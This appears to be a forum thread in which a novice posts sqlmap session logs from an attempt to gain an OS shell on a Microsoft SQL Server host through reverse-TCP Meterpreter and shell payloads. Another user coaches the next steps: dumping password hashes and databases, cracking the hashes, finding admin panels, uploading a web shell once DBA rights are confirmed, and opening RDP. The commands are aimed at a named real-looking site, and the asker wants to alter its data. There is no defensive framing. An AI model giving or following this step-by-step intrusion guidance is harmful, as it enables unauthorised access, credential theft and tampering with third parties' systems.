[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.180.128' (detected)] 192.168.180.128
which local port number do you want to use? [15786] 15786
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 3
[04:24:59] [WARNING] it is unlikely that the VNC injection will be successful because usually Microsoft SQL Server 2008 runs as Network Service or the Administrator is not logged in
what do you want to do?
[1] Give it a try anyway
[2] Fall back to Meterpreter payload (default)
[3] Fall back to Shell payload
> 2
[04:25:19] [INFO] creation in progress ........ done
[04:25:27] [INFO] uploading shellcodeexec to 'C:/Program Files/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpseapdm.exe'
[04:25:27] [INFO] using PowerShell to write the binary file content to file 'C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpseapdm.exe'
[04:25:28] [CRITICAL] page not found (404)
[04:25:28] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times

Check it out also, Sir.

[04:27:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[04:27:57] [INFO] testing if current user is DBA
[04:27:58] [INFO] testing if xp_cmdshell extended procedure is usable
[04:27:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:28:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[04:28:24] [ERROR] unable to retrieve xp_cmdshell output
[04:28:24] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.180.128' (detected)] 192.168.180.128
which local port number do you want to use? [51549] 51549
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 2
[04:28:43] [INFO] creation in progress ....... done
[04:28:50] [INFO] uploading shellcodeexec to 'C:/Program Files/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpseiwuv.exe'
[04:28:50] [INFO] using PowerShell to write the binary file content to file 'C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpseiwuv.exe'
[04:28:53] [CRITICAL] page not found (404)
[04:28:53] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times

[*] shutting down at 04:28:53


It says the shell cannot upload.
What should I do now?

The following command options I applied, but they won't work. Why?

which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection

AND

[1] Meterpreter (default)
[2] Shell
[3] VNC

Well, you said you want to

Q. Why it says REG_NO is empty?? and use valid parameter values.???

Because REG_NO=<Parameter>; it's basic: you need to give it a parameter so it can inject.

Now what should I do next when I am in os-shell>?

Try entering a Windows command to see if it is responding. It can happen at times that (for some useful commands) you do not get a reply inside the CLI. What you can do is listen on a port on your machine, and inside the OS shell you can ping your IP and port; if you get a ping, it means your commands are being run successfully. Let me explain: OS SHELL means you have terminal access to the machine. If you have SYSTEM access, that means that you have admin rights on the machine and you can literally do anything on the remote machine using your admin rights.

NOW WHAT TO DO NEXT? Now I am in sql-shell> and os-shell>.

SQL shell means you can run all SQL COMMANDS, and again, as it's a Windows server, you can use xp_cmdshell to execute Windows commands from within the SQL shell...

Metasploit Framework --os-pwn

For MSF commands you will need to read what it says, and for these you need to set up port forwarding and set the same port so that reverse connections come to your machine (port forwarding).

 

Which are the useful SQL commands? I am trying to type commands like hostname etc., but it won't work; it says NO OUTPUT. What should I do next? I am in os-shell> and sql-shell> mode.

I did correct my parameter; it's now fine, but what is the next step?
I found some user DB usernames with passwords with hash: long character/digit numbers.

How to convert the hash into a password?
sqlmap showed me a lot of information (ID, DB, USER, Pass) but how to connect or login there? And the password is showing as long digits/characters, it says HASH: how to encrypt/decrypt? The below commands are very useful sir.

--current-user
--current-db
--passwords
--tables
--columns
--schema
--dump

How to login into the database? What to do next sir? And another thing: how to find the admin page for editing, or edit the database?
How to ping my port and how to open RDP?
My question still stands and has not yet got a satisfactory answer sir.
  • I told you about hash encryption and decryption.
  • The login info you see in the DB is used to login to the web-based login panel (if any, which there usually is). You login into a DB using a DBMS. The admin page on a site you can find with various already placed scripts under Information Gathering / Profiling in Kali OS.
  • "How to ping my port", "How to open RDP": if you could only google the same lines. Anyway, what I said above was that you need to open RDP. I am giving you guidance and telling you what you might need to do to achieve what you are trying to do.
I hope you are not going to damage the web database. You can directly upload a web access shell through sqlmap if you have DBA.

DBA means he has admin/write privileges:
./sqlmap.py -u http://site.com/file.php?id=1,2,3 --current-user --is-dba
and it gives you current user is DBA 'True'.

Then you can upload a web access shell through sqlmap.

And your answers are here:

Hashes mostly used in SQL errors are MD5, SHA and NTLM.

If you have the database login & pass then you have to find the admin panel for the site, e.g. admin, administrator etc. etc.

If you want to open RDP (it stands for Remote Desktop Protocol), go to search in your OS and type there "Remote Desktop Protocol", first the IP of the server, then the login info.
No such file or directory found.
No file or directory found:

./sqlmap.py -u http://site.com/file.php?id=1

I gave you just an example, dear: http://site.com << your target site, /file.php << vulnerable location, ?id=1 << vulnerable number.

Now let me explain it to you.

./sqlmap.py -u www.drhack.net/contactus.asp?aid=120 is the vulnerable path, and then comes --current-user, which means the current user for that aid, and --is-dba. In full you have to use it like this:

./sqlmap.py -u www.drhack.net/contactus.asp?aid=120 --current-user --is-dba

If it gives "current user is DBA: True" then you can upload a web shell on that server or site.

But you have to put the correct path which is vulnerable to a SQL error; if it's not vulnerable then you can't do anything, dear.
When I type ./sqlmap.py ........ it says no file or directory found. It seems that ./sqlmap.py is not installed??
How will I come to know which page.asp is linked/connected with which database? I want to add some data details in site.com/page.asp?id=555.
So what will I do first to login to the database? Which thing will allow me to login into the database, and where can I add my own data to a specific id to edit or add?
When you type ./sqlmap.py it says no file, OK.

Go for => sqlmap -u http://site.com/page.asp?aid=434 --dbs << try this; if it worked then try --current-user --is-dba.
If you want to know which page.asp is linked/connected with the database then scan the full site or server on your b0x. Now lemme explain to you the full tut.
Can you give me your e-mail ID where I can send you all the output data/details?